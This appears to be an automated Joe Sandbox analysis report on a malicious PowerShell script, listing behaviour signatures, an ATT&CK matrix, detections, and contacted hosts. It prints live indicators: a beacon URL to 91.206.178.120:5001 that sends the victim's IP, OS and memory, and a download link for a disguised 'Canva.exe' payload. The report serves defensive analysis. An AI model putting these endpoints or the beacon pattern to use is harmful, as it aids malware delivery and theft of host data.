Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7468Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000000.00000002.1354012806.0000000008947000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1353705363.0000000008858000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1354498609.000000000895B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\Pmw24ExIdx.ps1 VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		31
Virtualization/Sandbox Evasion		OS Credential Dumping11
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Network Configuration Discovery		SSHKeylogging14
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync21
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Pmw24ExIdx.ps115%VirustotalBrowse
Pmw24ExIdx.ps111%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://91.206.178.120:5001/script_end?random_number=100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_end?random_number=$randomNumber100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_end?random_number=66350$M100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_end?random_number=66350100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft100%Avira URL Cloudmalware
https://goutteuy.com/wp-content/plugins/header-footer/images/Canva.exe100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_start?ip=100%Avira URL Cloudmalware
http://91.206.178.120:5001100%Avira URL Cloudmalware
https://goutteuy.com0%Avira URL Cloudsafe
https://goutteuy.com/wp-content/p100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=66350100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
goutteuy.com
185.211.7.193
truetrue
    		unknown
    maxcdn.bootstrapcdn.com
    		104.18.11.207
    		truefalse
      		high
      api.ipify.org
      		104.26.12.205
      		truefalse
        		high
        241.42.69.40.in-addr.arpa
        		unknown
        		unknownfalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.cssfalse
            		high
            https://goutteuy.com/wp-content/plugins/header-footer/images/Canva.exetrue
            • Avira URL Cloud: malware
            		unknown
            http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=66350true
            • Avira URL Cloud: malware
            		unknown
            http://api.ipify.org/false
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://91.206.178.120:5001/script_end?random_number=66350powershell.exe, 00000000.00000002.1346667806.00000000057B9000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://91.206.178.120:5001/script_end?random_number=$randomNumberpowershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501344002.0000020D591B5000.00000004.00000020.00020000.00000000.sdmp, Pmw24ExIdx.ps1false
                    • Avira URL Cloud: malware
                    		unknown
                    https://go.micropowershell.exe, 00000000.00000002.1346667806.0000000005C05000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://maxcdn.bootstrapcdn.com/powershell.exe, 00000000.00000002.1354012806.00000000088B7000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://91.206.178.120:5001/script_end?random_number=powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.microsoft.copowershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Licensepowershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Iconpowershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://91.206.178.120:5001/script_start?ip=powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.206.178.120:5001/script_end?random_number=66350$Mpowershell.exe, 00000000.00000002.1346667806.00000000057B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1346667806.00000000056B1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.206.178.120:5001powershell.exe, 00000000.00000002.1346667806.00000000057B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1346667806.000000000563E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css.powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://api.ipify.orgpowershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501141841.000000FCA7A99000.00000004.00000010.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501344002.0000020D591B5000.00000004.00000020.00020000.00000000.sdmp, Pmw24ExIdx.ps1false
                                    		high
                                    https://goutteuy.compowershell.exe, 00000000.00000002.1346667806.0000000005697000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$rapowershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501141841.000000FCA7A99000.00000004.00000010.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501344002.0000020D591B5000.00000004.00000020.00020000.00000000.sdmp, Pmw24ExIdx.ps1false
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://maxcdn.bootstrapcdn.com/)powershell.exe, 00000000.00000002.1354012806.00000000088B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoftpowershell.exe, 00000000.00000002.1346667806.000000000563E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://aka.ms/pscore6lBpowershell.exe, 00000000.00000002.1346667806.0000000005401000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://goutteuy.com/wp-content/ppowershell.exe, 00000000.00000002.1346667806.00000000057B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1346667806.00000000056B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&mpowershell.exe, 00000000.00000002.1346667806.000000000563E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://contoso.com/powershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1346667806.0000000005401000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              104.18.11.207
                                              		maxcdn.bootstrapcdn.comUnited States
                                              		13335CLOUDFLARENETUSfalse
                                              104.26.12.205
                                              		api.ipify.orgUnited States
                                              		13335CLOUDFLARENETUSfalse
                                              185.211.7.193
                                              		goutteuy.comGermany
                                              		46261QUICKPACKETUStrue
                                              91.206.178.120
                                              		unknownPoland
                                              		200088ARTNET2PLtrue

                                              General Information

                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1617745
                                              Start date and time:2025-02-18 08:25:03 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 5m 0s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:15
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:Pmw24ExIdx.ps1
                                              renamed because original name is a hash value
                                              Original Sample Name:6b61934dea7d3b16f46b12dc810972a58e4278632ad39abdbf79801fca7a4875.ps1
                                              Detection:MAL
                                              Classification:mal76.troj.winPS1@3/7@4/4
                                              EGA Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 93%
                                              • Number of executed functions: 41
                                              • Number of non-executed functions: 8
                                              Cookbook Comments:
                                              • Found application associated with file extension: .ps1

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 142.250.186.138, 142.250.184.238, 13.107.246.45, 52.149.20.212, 40.69.42.241, 20.109.210.53
                                              • Excluded domains from analysis (whitelisted): fonts.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com, www.google-analytics.com
                                              • Execution Graph export aborted for target powershell.exe, PID 7236 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              02:25:56API Interceptor41x Sleep call for process: powershell.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              104.18.11.207http://googlle.comGet hashmaliciousUnknownBrowse
                                              • maxcdn.bootstrapcdn.com/font-awesome/4.1.0/fonts/fontawesome-webfont.woff?v=4.1.0
                                              https://city-of-goodyear.webnode.page/Get hashmaliciousUnknownBrowse
                                              • maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap-theme.min.css
                                              http://Voyages.CNTraveler.comGet hashmaliciousUnknownBrowse
                                              • maxcdn.bootstrapcdn.com/font-awesome/4.3.0/fonts/fontawesome-webfont.woff2?v=4.3.0
                                              http://185.67.82.114Get hashmaliciousUnknownBrowse
                                              • maxcdn.bootstrapcdn.com/bootstrap/3.2.0/js/bootstrap.min.js
                                              SecuriteInfo.com.Exploit.Siggen3.17149.4489.xlsGet hashmaliciousUnknownBrowse
                                              • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                              SecuriteInfo.com.Exploit.Siggen3.17149.3543.xlsGet hashmaliciousUnknownBrowse
                                              • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                              SecuriteInfo.com.Exploit.Siggen3.17149.3543.xlsGet hashmaliciousUnknownBrowse
                                              • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                              SecuriteInfo.com.Exploit.Siggen3.17149.24514.xlsGet hashmaliciousUnknownBrowse
                                              • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                              SecuriteInfo.com.Exploit.Siggen3.17149.12724.xlsGet hashmaliciousUnknownBrowse
                                              • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                              SecuriteInfo.com.Exploit.Siggen3.17149.8245.xlsGet hashmaliciousUnknownBrowse
                                              • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                              104.26.12.205DeepLauncher.exeGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/
                                              [Huawei] Contract for YouTube partners.exeGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/
                                              NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/
                                              NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/
                                              lO5lV39HDj.exeGet hashmaliciousDarkTortilla, QuasarBrowse
                                              • api.ipify.org/
                                              SpacesVoid Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/
                                              55ryoipjfdr.exeGet hashmaliciousTrickbotBrowse
                                              • api.ipify.org/
                                              Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/
                                              RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                              • api.ipify.org/
                                              jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                              • api.ipify.org/?format=text

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              maxcdn.bootstrapcdn.comJim.flanigan Open annual plan_Catalinamarketing.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 104.18.11.207
                                              2025 Q1 Staff Pay Adjustment-Handbook.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 104.18.11.207
                                              Attach2.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 104.18.11.207
                                              Attach1.htmGet hashmaliciousHTMLPhisherBrowse
                                              • 104.18.11.207
                                              2025 Q1 Staff Pay Adjustment-Handbook.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 104.18.10.207
                                              Final_Draft_with_without_Removal_Depreciation_Report.htmGet hashmaliciousHTMLPhisherBrowse
                                              • 104.18.10.207
                                              https://claiim-hadiaah4.resminiid.net/Get hashmaliciousUnknownBrowse
                                              • 104.18.10.207
                                              https://xsin.it/Pemenang-GiveawayGet hashmaliciousUnknownBrowse
                                              • 104.18.10.207
                                              GasTechnologyPartnership.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 104.18.11.207
                                              https://zxx-ingkx-pylters.cz1.us.kg/Get hashmaliciousUnknownBrowse
                                              • 104.18.10.207
                                              api.ipify.orgSecuriteInfo.com.Win32.Evo-gen.5457.19170.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              • 104.26.12.205
                                              LmIclOjfqc.exeGet hashmaliciousAgentTeslaBrowse
                                              • 104.26.13.205
                                              http://account-5036237.kurhaus-steina.com/Get hashmaliciousUnknownBrowse
                                              • 104.26.12.205
                                              http://account-5078804.kurhaus-steina.com/Get hashmaliciousUnknownBrowse
                                              • 104.26.13.205
                                              https://business.accounts-security-center-overview.com/caseGet hashmaliciousUnknownBrowse
                                              • 172.67.74.152
                                              https://s3.us-east-2.amazonaws.com/tril-laxy-glow/UwyHSGw.html?EMAIL=mohallstaff@mohmuseum.orgGet hashmaliciousHTMLPhisherBrowse
                                              • 172.67.74.152
                                              https://s3.us-east-2.amazonaws.com/tril-laxy-glow/UwyHSGw.html?EMAIL=mohallstaff@mohmuseum.orgGet hashmaliciousHTMLPhisherBrowse
                                              • 104.26.12.205
                                              DeepLauncher.exeGet hashmaliciousUnknownBrowse
                                              • 104.26.12.205
                                              [Huawei] Contract for YouTube partners.exeGet hashmaliciousUnknownBrowse
                                              • 104.26.12.205
                                              Editing.exeGet hashmaliciousUnknownBrowse
                                              • 172.67.74.152

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUSCommercial Invoice Confirmation-1132346.vbsGet hashmaliciousUnknownBrowse
                                              • 104.21.16.1
                                              jjmax il.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 104.21.64.1
                                              Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 104.22.74.216
                                              Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 172.67.74.232
                                              Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 104.18.27.193
                                              FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeGet hashmaliciousDBatLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 104.21.32.1
                                              Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 104.18.27.193
                                              Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 172.67.23.234
                                              Payment_Activity_0079_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                              • 104.18.66.57
                                              payment1.jsGet hashmaliciousFormBookBrowse
                                              • 104.21.16.1
                                              QUICKPACKETUSINVOICE-No96322.pdf.exeGet hashmaliciousRemcosBrowse
                                              • 185.213.83.33
                                              Bukti_Transfer...pdf.exeGet hashmaliciousRemcosBrowse
                                              • 185.213.83.33
